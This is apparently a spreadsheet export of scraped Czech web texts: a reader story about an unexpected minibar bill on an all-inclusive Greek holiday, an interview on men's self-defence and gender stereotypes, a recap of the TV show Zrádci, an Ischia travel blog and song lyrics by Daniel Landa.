    <t>Hana (62): Děti nám zaplatily all inclusive dovolenou. Byla to největší chyba a horor! close 4 fotografie S manželem jsme dostali od dětí dárek k našemu třicátému výročí svatby. Dovolenou all inclusive v Řecku na deset dnů. Dojalo nás to a mysleli jsme si, že si to opravdu užijeme. Konec zájezdu byl pro nás ale naprosto šokující. Strávila jsem s manželem třicet let šťastného manželství. Vychovali jsme dvě děti, dceru a syna. Nikdy jsme neměli moc peněz, takže pokud jsme už někam jeli na dovolenou, cestovali jsme většinou po České republice , kde jsme si i sami vařili. Když nám letos darovaly děti jako dárek pobyt v Řecku , dojalo nás to a moc jsme se těšili. To jsme ale netušili, jak naše vůbec první dovolená v zahraničí skončí. VIDEO: Na co si dát pozor při výběru dovolené? Podívejte se na video. Zdroj: Youtube Krásný a dojemný dárek S manželem žijeme v malé obci v Libereckém kraji . Máme malý domeček, který jsme zdědili po tetě a který je naší největší radostí. Rádi pracujeme na zahrádce a volný čas trávíme převážně tam. Nikdy nám to nevadilo, dovolenou jsme si dokázali užít i v Česku. Oba máme stabilní zaměstnání, ale peněz jsme nikdy moc neměli. Co jsme vydělali, většinou jsme vrazili do domečku. Hodně jsme také podporovali naše děti, které jsou dnes dospělé. Jsme na ně pyšní, mají rodiny a skvěle placenou práci. Když nám darovaly zájezd do Řecka se slovy, abychom taky viděli něco jiného než naši zahradu, opravdu nám udělaly radost. Dovolená snů „Mami, tati, máte to all inclusive, takže všechno budete mít v ceně. Snídaně, obědy, večeře, dopolední a odpolední svačiny, nealkoholické i alkoholické nápoje, to všechno je zdarma,“ řekla nám dcera Majka. Vůbec se prý nemusíme nijak žinýrovat a můžeme se pořádně rozšoupnout. Když jsme dorazili na místo, byli jsme jako ve snu. Nádherný hotel s bazénem, krásné moře, a jak říkala dcera, vše zdarma. Užívali jsme si, plavali, procházeli se, jedli. Perfektní služby Protože jsme nikdy nebyli v hotelu, kde by fungovala i hotelová služba, byli jsme i v šoku z toho, že každý den, když jsme se vrátili z pláže na pokoj, byl uklizený. I to bylo samozřejmě v ceně. Občas jsem si říkala, že to je přece zbytečné, však jsme toho za ten den moc neušpinili, ale samozřejmě ustlané povlečení i čisté ručníky v koupelně byly fajn. Hotelový minibar Hned po příjezdu jsme si pořádně prohlédli pokoj a nadšeně jsme kvitovali, že je v něm i malá lednička. Byl v ní pytlík oříšků, čokoláda, dvě malé lahve vody, pivo , víno a coca-cola. „No to je skvělé, paráda,“ řekl manžel Jirka a všechno jsme hned první večer u televize snědli a vypili. Druhý den byla lednička po návratu z pláže opět naplněná a takhle to šlo po celou dobu naší dovolené. A každý večer jsme si i po večeři z pokojové ledničky brali všechno, na co jsme měli chuť. Šokující závěr dovolené To, že obsah hotelového minibaru není v ceně zájezdu a nespadá do all inclusive, to nás ani ve snu nenapadlo. Neupozornila nás na to ani dcera, ani delegátka zájezdu. Poslední den jsme odjížděli autobusem v deset hodin dopoledne. Sbalení jsme se odhlásili a nastoupili do autobusu. Ani ne za deset minut se delegátce ozvali z recepce, že se hosté musejí vrátit, protože jeden pokoj nemá zaplacený minibar. S hrůzou jsme zjistili, že jsme to byli my. Teprve tehdy jsme se dozvěděli, že vše, co je v minibaru, není v ceně zájezdu, tudíž se to platí. Když nám na recepci řekli, že musíme zaplatit asi deset tisíc korun, málem jsem dostala infarkt. Polil mě horký pot, navíc jsem se neuvěřitelně styděla. Nějaké peníze jsme měli, na zbytek se nám složili lidé z autobusu. Bylo to od nich krásné gesto. Všechno jsme jim pak samozřejmě vrátili, ale dodnes na tenhle hrozný trapas s manželem vzpomínáme. Další dovolenou strávíme raději zase doma na zahradě. Facebook X.com Threads Email Kopírovat Zavřít user facebook instagram Newsletter Odesláním souhlasím se Všeobecnými smluvními podmínkami a beru na vědomí Zásady zpracování osobních údajů spol. VLTAVA LABE MEDIA a.s. vlm Copyright © VLTAVA LABE MEDIA a.s. všechna práva vyhrazena Publikování, šíření nebo jakékoliv jiné užití obsahu pro jiné než osobní účely uživatele, je bez písemného souhlasu VLTAVA LABE MEDIA a.s. zakázáno. Toto ustanovení platí také pro RSS kanály a jejich obsah. Přihlášení Rádi bychom znali důvod proč se nechcete přihlásit. Odběr newsletteru Chcete pravidelně dostávat výběr nejlepších článků na Váš e-mail? Odesláním souhlasím se Všeobecnými smluvními podmínkami a beru na vědomí Zásady zpracování osobních údajů spol. VLTAVA LABE MEDIA a.s. Skutečně se chcete odhlásit? All inclusive jsme si v hotelu užívali plnými doušky. Popíjeli jsme dobré nápoje a využívali volný bufet. Dostali jsme od dětí dovolenou v Řecku all inclusive. Poprvé v životě jsme něco takového zažili. Bohužel konec byl šokující. Poslední den jsme se sbalili a chystali jsme se odjet i s ostatními autobusem. Jaké bylo naše překvapení, když nás zavolali zpět z recepce, že musíme zaplatit vše z minibaru. Částka nás šokovala. V hotelu jsme využívali naplno také pokojový minibar. Vůbec nás nenapadlo, že to, co je v něm, není součástí all inclusive.</t>
  </si>
  <si>
    <t>20241201_253_3474945723_991cfd84be3962ab4271.html</t>
  </si>
  <si>
    <t>991cfd84be3962ab4271</t>
  </si>
  <si>
    <t>Denní výběr: Poplatky za odpad v Chodově rostou. Město vysvětluje, proč je třídění klíčové</t>
  </si>
  <si>
    <t>20241201_254_3474945577_df9c3ab388c0b8b8319b.html</t>
  </si>
  <si>
    <t>df9c3ab388c0b8b8319b</t>
  </si>
  <si>
    <t>Denní výběr: Začátek Krajské ligy v sálovém fotbalu se vydařil Bohuslavicím a Oldstarsu</t>
  </si>
  <si>
    <t>20241201_255_3474945534_090baf5d38d61cdb97f7.html</t>
  </si>
  <si>
    <t>090baf5d38d61cdb97f7</t>
  </si>
  <si>
    <t>20241201_256_3474885059_2b0a757f21ab78938ef1.html</t>
  </si>
  <si>
    <t>2b0a757f21ab78938ef1</t>
  </si>
  <si>
    <t>Pavel Houdek: I muži potřebují sebeobranu. Často jsou terčem násilí, kterému by šlo předejít</t>
  </si>
  <si>
    <t>Shrnutí Pavel Houdek: I muži potřebují sebeobranu. Často jsou terčem násilí, kterému by šlo předejít ROZHOVOR / „Zatímco u žen se už otevírá diskuze o tom, že tradiční obraz ženství není jediný správný a že ženství může mít různé podoby, u mužů to tak není. Nezabýváme se tím, jak stereotypy dopadají na muže a co to znamená pro jejich zdraví nebo kvalitu života,“ říká právník, kriminolog a spoluzakladatel Moderní sebeobrany Pavel Houdek. V rozhovoru pro deník FORUM 24 popisuje, jak ženy a muži přistupují k násilí, proč i muži potřebují sebeobranu a proč mohou být představy o tradičním mužství nebezpečné. Když se mluví o sebeobraně, plno lidí si možná představí, že se týká hlavně žen. Ale co muži? Samozřejmě i muži potřebují sebeobranu. Jenže si často představíme stereotyp, že muž jde po ulici, někdo do něj vrazí ramenem, on se otočí, ten druhý do něj začne strkat a nakonec ho udeří. Nebo si představíme situaci v hospodě, kdy někdo přijde, strčí do vás a řekne: „Ty jsi mi rozlil pivo , pojď ven!“ Pak jdete ven a tam začne nějaké postrkování. Ale tohle jsou právě příklady násilí, které ve většině případů nemusí skončit fyzickým střetem. A právě tady je sebeobrana paradoxně užitečná. Ne však ta tradiční, kterou si představíme – že se někdo učí bojovat. Ale taková sebeobrana, která vás naučí vůbec se do takové situace nedostat. Respektive, pokud už k ní dojde, jaké strategie a taktiky použít, abych se konfliktu vyhnul a neskončil ve rvačce. Jasně, člověk se potřebuje umět ubránit i fyzicky, protože všechny preventivní kroky nemusí vždy fungovat. Ale víme, že téměř všechno násilí je tzv. sociální, a tedy téměř vždy se mu dá předcházet. Liší se sebeobrana pro ženy a pro muže? Určitě liší. Neliší se samotné fyzické jádro, ale dvě věci: situace, do kterých se muži a ženy můžou dostat, a způsob, jak k násilí přistupujeme. Ženám mnohem častěji hrozí sexualizované obtěžování nebo násilí. I když se stále více ukazuje, že rozdíl mezi muži a ženami v této oblasti není tak velký, jak si myslíme. Sexualizované obtěžování a násilí vůči mužům je nahlašováno ještě mnohem méně často než u žen. Liší se tedy druh ohrožení a také to, jak k němu muži a ženy přistupují. To souvisí s výchovou a s naším sebeobrazem. Právě v těchto dvou oblastech vidím největší rozdíly. Jak se tedy přístup mužů a žen liší? Celý život jsme vychováváni jinak, což má zásadní vliv na to, jak k násilí přistupujeme. Kluky od malička v konfliktech spíš povzbuzujeme. Když se začnou třeba prát s klacky, řekneme: „Kluci jsou kluci, to je normální.“ Ale když něco podobného udělají holčičky, řekneme jim: „Nedělej to, umažeš se, zničíš si šaty, nikdo tě pak nebude chtít.“ A tohle pokračuje až do dospělosti. Když muž vstoupí do konfliktu – a teď nemyslím nutně jen rvačku v hospodě, ale jakýkoliv konflikt – často to vnímáme pozitivně. Říkáme, že je rozhodný, průbojný, že si dokáže stát za svým. Když to ale udělá žena, často na ni pohlížíme jinak, jako na hysterickou, nebo že se chová jako „babochlap“. Když tohle slyšíme celý život, odráží se to na tom, jak ke konfliktu přistupujeme. V důsledku to znamená, že ženy jsou socializované k tomu, aby si spíš nechaly věci líbit. Když dojde k nepříjemné situaci, očekává se od nich, že použijí „ženský způsob řešení“, tedy usmát se, neeskalovat, vyhnout se přímé konfrontaci. Muži jsou naopak povzbuzováni ke konfliktu. A pokud by si muž něco nechal líbit, okolí na něj reaguje negativně a ženskou roli či nálepku („Jsi baba“) používá jako urážku. To pak vede k tomu, že muži jsou mnohem častěji terčem nebo obětí násilí, kterému by šlo relativně snadno předejít. Jenže nejsme učeni konfliktu předcházet, učíme se ho vyhrotit. To je přesně ten typ situace rvačky v hospodě. Teoreticky by si každý řekl, že se ven prát nepůjde, ale v reálné situaci si pak většina lidí řekne: „Přece si to nenechám líbit, nebudu za slabého. Když mě někdo vyzve a půlka hospody se na mě dívá, tak jak bych vypadal?“ Nikdo nechce vypadat jako zbabělec. Ale to jsou případy, které končí tragicky. Opačně to funguje u žen, které se nebrání, protože si řeknou: „Co si o mně pomyslí? Budou mě považovat za hysterku, za problémovou.“ A pak se za sebe nepostaví vůbec a nechají si líbit i zacházení, které je dávno za hranou. Jsou stereotypy ve společnosti stále silně přítomné? Jednoznačně, a u mužů to je výrazně silnější než u žen. Je i taková akademická teze, že pokud jde o násilí, zejména sexualizované násilí, tak otázka mužská je zhruba o dvacet let a víc za otázkou ženskou. U spousty témat spojených se stereotypy, které dopadají na ženy, už proběhla určitá společenská diskuze – feministické nebo ženské hnutí je otevřelo a stala se z nich aktuální témata. Například už není považováno za nutné nebo žádoucí, aby existoval jen jeden standard nebo ideál krásy. Je běžné, že na obálkách časopisů nebo v reklamách se objevují ženy s různými typy postav, váhou i vzhledem. Vidíme modelky s různými těly a rysy, a to i u značek, které prodávají spodní prádlo nebo kosmetiku. Ale u mužů tohle vůbec není téma. Když se podíváte na mužské časopisy, na obálce vždycky najdete stejný typ – je to muž s pěti procenty tělesného tuku, vyrýsovanými svaly a podobně. A tohle je jen jeden příklad z mnoha, který ilustruje, jak moc zaostáváme. Zatímco u žen se už otevírá diskuze o tom, že tradiční obraz ženství není jediný správný a že ženství může mít různé podoby, u mužů to tak není. Nezabýváme se tím, jak stereotypy dopadají na muže a co to znamená pro jejich zdraví nebo kvalitu života. Jaký vliv to tedy na muže má? Víme ze statistik, že jsou rozdíly mezi muži a ženami například v délce života. Ženy se dožívají výrazně vyššího věku než muži. Víme, že muži výrazně častěji páchají sebevraždy, mají častější duševní problémy a potíže. A tohle všechno jsou dopady spojené se stereotypy, které nás provázejí celý život. Máme tu obraz „macho chlapa“, který všechno zvládne sám, nikoho svými problémy nezatěžuje. A to má velmi konkrétní dopady. Když nejsme zvyklí mluvit o svých problémech, tak logicky mnohem méně často vyhledáváme pomoc, třeba terapii. Kvůli tomu pak máme vyšší míru psychických onemocnění a také vyšší míru sebevražd. Další věc je prevence. Muži ji často zanedbávají, protože si myslí, že si zvládnou poradit sami, nebudou si stěžovat, nebudou chodit k doktorovi. A když už nakonec k doktorovi jdou, tak je třeba pozdě. To jsou jen některé příklady, jak stereotypy dopadají na zdraví. Nezabýváme se tím, jak stereotypy dopadají na muže a co to znamená pro jejich zdraví nebo kvalitu života. Je tady také představa, že ženy jsou přirozeně lepší ve schopnosti postarat se o dítě. To vede k tomu, že při rozvodech děti ve většině případů automaticky zůstávají u matky, aniž by se zkoumalo, kdo z rodičů je pro péči vhodnější. Jak jsem říkal, jsme v oblasti mužských práv a rolí o několik desetiletí pozadu za ženským hnutím. A jsme teprve na začátku fáze, kdy začínáme některé věci zpochybňovat. Ale hned se na nás snáší kritika, podobně jako kdysi na ženy, které začaly zpochybňovat ideály krásy. Byly obviňovány, že prostě nemohou splnit očekávání, a tak jen plivou na ten ideál. My muži jsme na tom podobně. Když začneme zpochybňovat mužské stereotypy, slyšíme: „Ty nejsi dost chlap. Nejsi dost silný. Nejsi dost mužný.“ Tahle reakce tu byla, je a bude. A všechno, čím prošlo ženské hnutí, nás teprve čeká. Tyhle stereotypy můžeme do určité míry vidět i v politice, například u Donalda Trumpa nebo u nás u Filipa Turka . A z výsledků voleb víme, že to rezonuje třeba u mladých mužů poměrně dost. Čím to je? Myslím, že tam hraje roli to, že ženské hnutí je hodně vidět. Po desetiletích práce začíná přinášet jasné výsledky a měnit společnost. Ženy pomalu, ale jistě, dosahují cílů, které si vytyčily – bourají skleněné stropy, získávají příležitosti ve vedení firem, v politice a podobně. Mají dnes výrazně více možností. A jakmile ty možnosti mají, logicky je využívají. Například před sto lety jsme ženám umožnili studovat, a dnes vidíme výsledky: ženy začínají mít lepší studijní výsledky, lépe zvládají přijímací zkoušky, a dnes většinu vysokoškolských studentů tvoří ženy. Roste jejich zastoupení i v technických oborech. To vede k tomu, že ženy jsou samostatnější, mají více možností. Tím pádem se mění i tradiční mužská role. Dřív byl muž vnímán jako chlapák, živitel rodiny, lídr, ten, kdo všechno řídí. Jenže tohle mizí a mužská role je zpochybněná. Jsou na to dvě možné reakce. První je přizpůsobit se, říct si: „Doba se mění, ženy mají více příležitostí. Nemám už automatická privilegia, která měl můj dědeček, protože on byl jediný, kdo vydělával, zatímco babička byla celý život doma.“ Druhá reakce je začít naříkat, upnout se k minulosti a stereotypům. Když jste zmínila Donalda Trumpa – ano, on je symbolem tohohle přístupu. Má za sebou historii kontroverzních sexuálních výroků a chování. Ale vidíme to i v takzvané manosféře – mezi influencery jako Andrew Tate a dalšími, kteří šíří mnohem vyhrocenější a nebezpečnější postoje. Tihle lidé jsou otevřeně misogynní, nenávistní a násilní. Přitahují část mladých mužů, kteří na sobě nechtějí pracovat, nechtějí se rozvíjet a mají pocit, že za jejich neúspěchy mohou ostatní. A když se objeví někdo jako Andrew Tate, kdo jim řekne: „Za to můžou ženy. Ony tě mají poslouchat!“ – tak na to někteří slyší. Jak se dají stereotypy odbourávat? Vy jste říkal, že muži jsou v tomhle o 20 let za ženami, znamená to, že podle vás k tomu dospějeme časem? Myslím, že ano, protože moc nevidím jinou cestu. Jsou tu dvě možnosti. První je ta manosférická, tedy že bychom rozpoutali nějakou válku mezi pohlavími, nasadili ženám obojek a připoutali je zpátky do kuchyně. To se podle mě nestane, nicméně mohou přijít nějaké dílčí propady – ostatně vidíme to třeba v Americe , kde se práva, která jsme považovali za univerzálně lidská, jako například právo na potrat, dostávají pod tlak některých politických směrů. Druhá, pravděpodobnější cesta je ta, že emancipaci společnost dotáhne dokonce. A tím nemyslím jen ženskou emancipaci, protože ta pořád není dotažená – máme tu stále spoustu problémů, například otázku sexualizovaného násilí – ale i tu mužskou. Začneme se dívat i na to, jak systém dopadá na muže, otevřeme témata, která je ovlivňují a redefinujeme, jak k mužství přistupujeme. Je důležité říct, že to ale neznamená, že bychom to překlopili do nějakého opaku nebo karikatury. Když se řekne, že narušujeme koncept mužství, dost lidí si představí vyhrocený opak – třeba kluka, který má 55 kilo, nalakované nehty, dlouhé vlasy a nosí šaty. Pokud to někdo dělá, je to samozřejmě v pořádku, nechci to shazovat, ale rozhodně to není jediná cesta, jak narušování tradičního mužství musí vypadat. Je v pořádku narušovat podoby mužství a naučit se o problémech mluvit a říct si o pomoc. Nikomu to neubere na mužnosti. Stejně tak je v pořádku nehrát si pořád na tvrďáka, ale projevit laskavost a citlivost. Koneckonců, když se podíváme na výzkumy, většina žen přesně tohle od svého partnera chce. Dřív byl muž vnímán jako chlapák, živitel rodiny, lídr, ten, kdo všechno řídí. Jenže tohle mizí a mužská role je zpochybněná. A dojdeme k tomu tedy podle vás přirozeně? Nevím, jestli k tomu přirozeně dojdeme. Dojdeme k tomu, když se o těch věcech budeme bavit a začneme je jako společnost řešit. A k tomu budeme potřebovat i ženy. Je evidentní, že jak jsme v tomhle pozadu, sami to nezvládneme. Samozřejmě většina práce je na nás mužích. Stejně jako se zformovalo ženské hnutí, bude se muset zformovat i mužské hnutí – takové, které ten tradiční obraz bude narušovat, ne na něj navazovat. Teď je na nás, abychom ta témata začali zvedat a řešit si je. A až to začneme dělat, přijde chvíle, kdy budeme potřebovat ženy jako spojence. Chodí k vám na kurzy sebeobrany také muži? Chodí, je to přibližně třetina nebo čtvrtina. Většina našich kurzů je sestavená tak, že jsou pro všechny. A setkali jste se s tím, že mužům brání stereotypy v tom, aby si přiznali, že potřebují pomoct, potřebují se naučit sebeobranu? Pokud má někdo tenhle přístup nazírání na svět, kdy chce být ten tvrďák a bojovník, tak k nám nepřijde. Takový člověk spíš půjde na MMA nebo někam, kde se naučí bojovat. Ale je spousta mužů – podle mě možná i většina – kteří se někdy v životě ocitnou v situacích, kdy jsou blízko nějakému násilí. Mohou být třeba jeho svědky. Velmi často k nám chodí tátové od rodiny, kteří jdou s dítětem, nějakou situaci vidí a pak si řeknou: „Co mám dělat?“ Mají s sebou dítě, takže utíkat nemůžou. Zároveň ale nemají povahu rváče. Moderní sebeobrana jim nabídne strategii, jak se do konfliktu vůbec nedostat, jak ho uklidnit a vyhnout se násilí. Neuděláme z nikoho rváče, ale zároveň je naučíme, jak se rozumně fyzicky bránit, když to jinak nejde.</t>
  </si>
  <si>
    <t>20241201_257_3474870722_3fffed04b46fc71f267c.html</t>
  </si>
  <si>
    <t>3fffed04b46fc71f267c</t>
  </si>
  <si>
    <t>Přehled nejdůležitějších zpráv</t>
  </si>
  <si>
    <t>20241201_258_3474888054_fca012c9170cc078dc8a.html</t>
  </si>
  <si>
    <t>fca012c9170cc078dc8a</t>
  </si>
  <si>
    <t>Zbývající věrní i zrádci byli u zpovědi: Vylili si srdce před Vojtou Kotkem</t>
  </si>
  <si>
    <t>Zbývající věrní i zrádci byli u zpovědi: Vylili si srdce před Vojtou Kotkem Zrádci i věrní byli u zpovědi. Vylili si srdce před Vojtou Kotkem (Zrádci 11. díl) V jedenáctém díle detektivní hry Zrádci Vojta Kotek vyzpovídal jak věrnou Sarah, tak zrádkyni Nicole. Zdroj: Prima FTV Vojtěch Kotek se v jedenáctém díle detektivní hry Zrádci dostal do role zpovědníka soutěžících. Zdroj: Prima FTV U své zpovědi v jedenáctém díle detektivní hry Zrádci Nicole stydlivě klopila zrak. Byla to hra, stejně jako když přísahala na smrt svého dědečka? Zdroj: Prima FTV Ke zpovědi se v jedenáctém díle detektivní hry Zrádci dostali i Martin a Tuňák. Zdroj: Prima FTV Vojtěch Kotek se v jedenáctém díle detektivní hry Zrádci vtělil do role zpovědníka. Zdroj: Prima FTV V jedenáctém díle detektivní hry Zrádci Vojta Kotek vyzpovídal jak věrnou Sarah, tak zrádkyni Nicole. Zdroj: Prima FTV Vojtěch Kotek se v jedenáctém díle detektivní hry Zrádci dostal do role zpovědníka soutěžících. Zdroj: Prima FTV U své zpovědi v jedenáctém díle detektivní hry Zrádci Nicole stydlivě klopila zrak. Byla to hra, stejně jako když přísahala na smrt svého dědečka? Zdroj: Prima FTV Ke zpovědi se v jedenáctém díle detektivní hry Zrádci dostali i Martin a Tuňák. Zdroj: Prima FTV Vojtěch Kotek se v jedenáctém díle detektivní hry Zrádci vtělil do role zpovědníka. Zdroj: Prima FTV Detektivní hra na zrádce a věrné se blíží do tolik očekáváného finále. Téměř všichni, kteří se v ní do tohoto momentu udrželi, v jejím průběhu někomu jinému ukřivdili nebo přímo uškodili. A tak před branami finále dostal každý jedinečnou možnost vyzpovídat se. A s těmi, kterým se nejdřív žádný hřích dobrovolně přiznat nechtělo, si poradil Vojta Kotek (36) tentokrát v roli duchovního. „Já bych se vyzpovídal,“ přijme jako první výzvu Vojty Kotka Honza Vlachynský. „Že jsem někdy byl trošku tvrdý na Johnyho. I když je zrádce, tak jsem to mohl říkat mileji,“ vyřkne pouze v přítomnosti moderátora a rovněž také Johnyho barman, který mezi soutěžícími vyniká na muže netypicky barevným oblečením i doplňky. Těžko říct, proč Honza zvolil strategii pokračovat v osočování Johnyho. Noc předtím ho totiž v tu chvíli jediná zrádkyně Nicole vydírala, Honza se tak stal rovněž zrádcem a moc dobře tudíž věděl, že Johny je jasným věrným. Nicméně u zpovědi se rozhodl hovořit jinak. Celebrity Velké finále Zrádců se blíží. Diváky čeká speciální díl i promítání v kinech Na otázku Vojty Kotka, zda je něco, z čeho by se chtěl vyzpovídat, odpoví Martin Růžička , že nikoli. A tak na něj moderátor, který má od začátku show oči doširoka otevřené, sám vytáhne jeden hřích. A překvapivým odhalením zaskočí nejen statného strážce zákona, ale i Tuňáka, který v tu chvíli klečí vedle něj. Martin sléval a slévá drinky po ostatních dohromady. „Občas nám tady přistane v ledničce víno a je ho docela málo. Takže zbytky přeliju do své sklenice a vypiju to,“ vysvětlí s úsměvem a viditelnou úlevou ve tváři hnědooký policista. Mohlo to být jistě i horší. Tuňák a Martin přiznali myšlenky na odstoupení ze soutěže. Každý z jiných důvodů Těsně před finále detektivní hry Zrádci dostane šanci ulevit svému svědomí i Sarah. Nejmladší účastnice na to ovšem zareaguje tak, že doufá, že ve hře neudělala žádný hřích, ze kterého by se musela vyzpovídat. Pročež před ni Vojta Kotek napřímo předloží, že se doslechl, že Sarah flirtuje s rytířem křivoklátského stolu Martinem . „Paráda. To, že teďka ho potřebuju mít na své straně, aby mě třeba v noci nezabil, to je pravda. Protože jsem si stoprocentně jistá už teď, že on je zrádce, a že je zároveň zrádce s Honzou,“ ozřejmí své myšlenkové pochody Sarah, která na konci desátého dílu přesvědčila samu sebe, že zrádcem je Martin . A hotovo. Samozřejmě bez důkazů, kterých se ale věrným v téhle hře jaksi nedostává. Komu přejete vítězství ve hře Zrádci? Johnnymu % Sarah % Tuňákovi % S čím se vyzpovídají Johny, Tuňák a Nicole? A koho hráči vyhlasují u kulatého stolu a pošlou do vyhnanství před branami velkého finále? Jak bude fungovat spolupráce a koexistence původní zrádkyně Nicole a nově vydíraného zrádce Honzy? Jedenáctý díl detektivní hry Zrádci uvidíte v neděli večer na televizi Prima, případně už teď je dostupný na prima+. Autor článku Odesláním formuláře souhlasíte s podmínkami zpracování osobních údajů Sdílejte článek Štítky finále zpověď Vojtěch Kotek Martin Růžička Jan Tuna Křivoklát Nicole Šáchová Zrádci Sarah Horáková TOP Videa Autor: Autor článku | Kisa Císařová | Všechny články autora || FTV Prima</t>
  </si>
  <si>
    <t>20241201_259_3474877834_3a5169823620d5dbe790.html</t>
  </si>
  <si>
    <t>3a5169823620d5dbe790</t>
  </si>
  <si>
    <t>Dovolená na&amp;nbsp;Ischii s&amp;nbsp;maminkou V.</t>
  </si>
  <si>
    <t>Dovolená na&amp;nbsp; Ischii s&amp;nbsp;maminkou V. Dovolená na Ischii s maminkou V. Foto: Pixabay 6. října 2024 Většina lidí odjíždí na dovolenou a říká, že si chce od všeho odpočinout. Odpojit se od toho rušného světa nepřetržitě sdíleného on-line. Tak mně se to povedlo. A hned nastalo pozdvižení. Odpojila jsem se tak dokonale, že se ještě stále nedokážu na ten matrix znovu napojit. A všichni se pořád diví, proč Zoufalcovy zápisky zůstaly v půli cesty. Ptáte se: Žijete? Vše v pohodě? Už jste doma? Foto: Barbora Janečková Ano, žijeme. Ano, vše je v pohodě. Ano, už jsme doma. Po cestě autobusem, lodí, letadlem, trolejbusem, metrem, vlakem a autem v jediný den jsme se z Ischie s maminkou vrátily v pořádku. V seznamu dopravních prostředků chyběla jen koňská spřežka. Bylo to opět náročné, ale konec dobrý, všechno dobré. Ahmed zůstal na ostrově a hned jak hotel na konci října zavře, poletí do Maroka . Naše opálená kůže postupně vybledne, naakumulované teplo z nás vyprchalo už v Praze na letišti. Je tu zima, prší, je tma a nevlídno. Zůstaly nám jen fotky a vzpomínky na společné zážitky. Foto: Barbora Janečková Kombinace osvěžující mořské vody a termálních pramenů je něco fantastického. Dokonce i maminka chodila se mnou do moře, když si předtím vždy vyžádala mé slovo, že ji dostanu zpátky na břeh. Vystoupit z vln do svahu z jemných kamínků a písku je trochu namáhavé, protože se vám nohy neustále boří hlouběji a hlouběji. I tak jsme to vždycky zvládly, po dvou nebo po čtyřech, jednou mamince přišel na pomoc místní plavčík. Podal jí ruku, jako by ji vyzýval k tanci, aniž by odhadl sílu maminčiny osobnosti deroucí se na souš. Pozorovala jsem to z moře a dobře jsem se bavila. Já mám tu potíž, že nedokážu dobrovolně pobyt v moři ukončit. Voda měla tak 25 stupňů, což je osvěžující a příjemné zároveň. Moje tělo má ideální proporce pro demonstraci Archimédova zákona, protože vztlaková síla mě nadnáší tak, že můžu plavat jen pod vodou. Na hladině se mi neustále zvedá zadek jako bójka, kterou nepotopíte. Tak jen tak ležím a nechám se houpat na vlnách bez jediného tempa. Života běh se zastaví. Je jen tady a teď. Kdo by chtěl dobrovolně zpátky do toho blázince? Tato až nesnesitelná lehkost bytí byla příčinou toho, že jsem se na týden ztratila v čase a prostoru. Protože z moře jsme se s maminkou chodily prohřát do termálních bazénů. Jen si představte, o čem si dokážete přemýšlet ve vodě teplé 36 stupňů, která vás obklopuje, prostupuje, objímá. Já to vím přesně: o ničem. Maminka ještě zvládala pozorovat všechny lidi okolo a sdělovat mi své postřehy, ale já už jsem byla mimo. Do toho jsme měly nad hlavou modro nebes. Sluníčko svítilo celé dny, aniž by pálilo. Bylo to dokonalé. Foto: Barbora Janečková Když jsme se vždycky v podvečer z Poseidonových zahrad vyšplhaly zpátky do hotelu na kopci, úplně jsme odpadly. Kdepak otevřít počítač a sepisovat zážitky. Číst e-maily a komentáře. Jediné, k čemu počítač většinu dovolené sloužil, bylo naše večerní sledování Mentalisty. Maminka usnula do první reklamy a já jsem se pak kochala tím krásným chlapem o samotě. Co říkal, kdo koho zabil a proč, to samozřejmě nevím. Stačilo mi dívat se do těch modrých očí a pak spát. Aspoň pár hodin. Číst dále Režim, který jsme si několik let doma budovala, se tady úplně rozsypal. Kdepak jíst naposledy odpoledne! Snídáme brzy a pozdě, až kolem deváté večer, večeříme. Končíme miskou zmrzliny. A velké pivo k tomu. Moře, které opravdu bytostně miluju, mě tak nabíjí energií, že když slyším jeho hukot přes otevřené dveře na balkon, nemůžu vůbec spát. Je mi totiž líto spát. Někdy sedím v noci venku na balkoně a hodiny pozoruju stříbrnou hladinu. Černé nebe pravidelně rozčísnou paprsky světla z majáku naproti v zálivu. V noci tady dost fouká, ale vůbec není zima. Je vlhko a neschne mi tu ani rychleschnoucí ručník. Foto: Barbora Janečková Strašně rychle to uteklo. Omlouvám se všem milovníkům Zoufalce, ale na žádné příhody už si nevzpomenu. Pořád bylo čemu se smát. S každým jídlem, s každým podivínem v bazéně, při každé vzpomínce na našeho tatu a jeho hlášky. Veškerou moji mentální kapacitu spotřebovalo dolce far niente, sladké nicnedělání. Bylo to boží, návykové. Bráním se návratu do pracovního režimu z posledních sil, maminka se z toho dokonce roznemohla. Tohle dokáže Ischia. Tam se musím rozhodně vrátit. Kdo pojede se mnou? Zdroj: redakce – Barbora Janečková (autorské dílo), www.uzasnabara.cz Další články z této rubriky Autor: Bára Úžasná Autor person Bára Úžasná</t>
  </si>
  <si>
    <t>576</t>
  </si>
  <si>
    <t>552</t>
  </si>
  <si>
    <t>20241201_26_3478954539_ad4edc8d1c5da6143c08.html</t>
  </si>
  <si>
    <t>ad4edc8d1c5da6143c08</t>
  </si>
  <si>
    <t>Pozdrav z fronty - Daniel Landa - Vltava Tour, 2003 (2003)</t>
  </si>
  <si>
    <t>Pozdrav z fronty - Daniel Landa - Vltava Tour, 2003 (2003) Vltava Tour, 2003 (2003) Pozdrav z fronty Je na nádhernej večer, tak začínám psát a víno mi dodalo sil. Bůh je mi svědkem,že měl jsem tě rád - to tenkrát snad ještě byl. Tvý dopisy všechny jsem tisíckrát čet, v nich stálo, jak v tvým klínu spím. Však s posledním volnem se roztříštil svět v němž nikdy tě neopustím. Pak u vlaku ty - cizí žena! Promiň mi, že jsem ti lhal. Ještě teď slyším tě toužebně sténat... Tu tvoji fotku jsem roztrhal. Už nepřijdu nikdy tou pěšinou k vám. Víš, já jsem teď tady ty tam. U díry v blátě se sám sebe ptám, a sám si i odpovídám... ... proč u vlaku jste stály na mě jste se smály, ty a moje máma, starší cizí dáma. Dětskej pokoj? K smíchu! Povečeřím v tichu. Rozhovory váznou, vždyť mám duši prázdnou. Vzpomínky jen bolí ať už na cokoli. Ztracenej je klíč... Už abych byl pryč! Zpátky se chci vrátit, ne se tady ztratit. Fronta zpátky láká, domov pro vojáka. Když země je rozrytá polibky děl a hvízdání protíná vzduch, píše ti kacíř, co do pekla chtěl pro mámení barevnejch stuh. Pro tenhle okamžik nemůžu lhát a utíkat jak malej kluk. Ať jinej zabuší u vašich vrat - mě uhranul polnice zvuk. Když zatroubí nám k boji, tak to za to stojí. Nenávist i láska - kolem země praská. Plameny se mají, když si s náma hrají. Pak nastane klid a my snad můžem jít každej do svý díry bez boha a víry. Z ušlápuejch branců zbyla banda kanců! Tak se teda měj a něco si přej, než se nebe zřítí a tím skončí žití. A tak posílám ti pozdrav z fronty. Oheň už přestává hřát. Víno je silný a teploučký střílny, přijmou mě s láskou až odejdu spát. videoklip Přidej i ty svuj názor! stawa Landa Všechny texty 